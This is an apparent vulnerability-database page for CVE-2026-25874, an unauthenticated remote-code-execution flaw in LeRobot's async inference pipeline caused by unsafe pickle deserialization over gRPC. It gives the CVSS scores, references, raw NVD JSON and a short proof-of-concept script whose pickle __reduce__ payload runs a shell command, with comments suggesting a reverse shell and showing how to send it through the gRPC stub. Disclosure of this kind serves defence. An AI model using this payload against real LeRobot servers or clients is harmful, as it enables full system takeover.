CVE-2026-25874

Description

LeRobot through 0.5.1 contains an unsafe deserialization vulnerability in the async inference pipeline where pickle.loads() is used to deserialize data received over unauthenticated gRPC channels without TLS in the policy server and robot client components. An unauthenticated network-reachable attacker can achieve arbitrary code execution on the server or client by sending a crafted pickle payload through the SendPolicyInstructions, SendObservations, or GetActions gRPC calls.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:huggingface:lerobot:*:*:*:*:*:python:*:* - VULNERABLE

LeRobot <= 0.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pickle
import os

# Define a malicious class to execute code upon deserialization
class ExploitPayload:
    def __reduce__(self):
        # Execute arbitrary command (e.g., create a file or reverse shell)
        return (os.system, ('touch /tmp/pwned',))

# Serialize the malicious object
malicious_data = pickle.dumps(ExploitPayload())

# In a real attack scenario, send this byte stream via gRPC
# Example using a generic gRPC client stub:
# stub.SendPolicyInstructions(request=malicious_data)

print(f"Generated payload length: {len(malicious_data)}")
print("Payload contains arbitrary code execution via pickle.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-25874
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-25874
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-25874/
[4] VulDB https://vuldb.com/cve/CVE-2026-25874
[5] https://chocapikk.com/posts/2026/lerobot-pickle-rce/
[6] https://github.com/huggingface/lerobot/issues/3047
[7] https://github.com/huggingface/lerobot/issues/3134
[8] https://github.com/huggingface/lerobot/pull/3048
[9] https://www.vulncheck.com/advisories/lerobot-unsafe-deserialization-remote-code-execution-via-grpc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-25874", "sourceIdentifier": "[email protected]", "published": "2026-04-23T20:16:13.903", "lastModified": "2026-04-28T19:01:40.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LeRobot through 0.5.1 contains an unsafe deserialization vulnerability in the async inference pipeline where pickle.loads() is used to deserialize data received over unauthenticated gRPC channels without TLS in the policy server and robot client components. An unauthenticated network-reachable attacker can achieve arbitrary code execution on the server or client by sending a crafted pickle payload through the SendPolicyInstructions, SendObservations, or GetActions gRPC calls."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:lerobot:*:*:*:*:*:python:*:*", "versionEndIncluding": "0.5.1", "matchCriteriaId": "C91BE4D0-80D2-4E4D-810A-DF1A949D789E"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2026/lerobot-pickle-rce/", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://github.com/huggingface/lerobot/issues/3047", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/huggingface/lerobot/issues/3134", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/huggingface/lerobot/pull/3048", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://www.vulncheck.com/advisories/lerobot-unsafe-deserialization-remote-code-execution-via-grpc", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}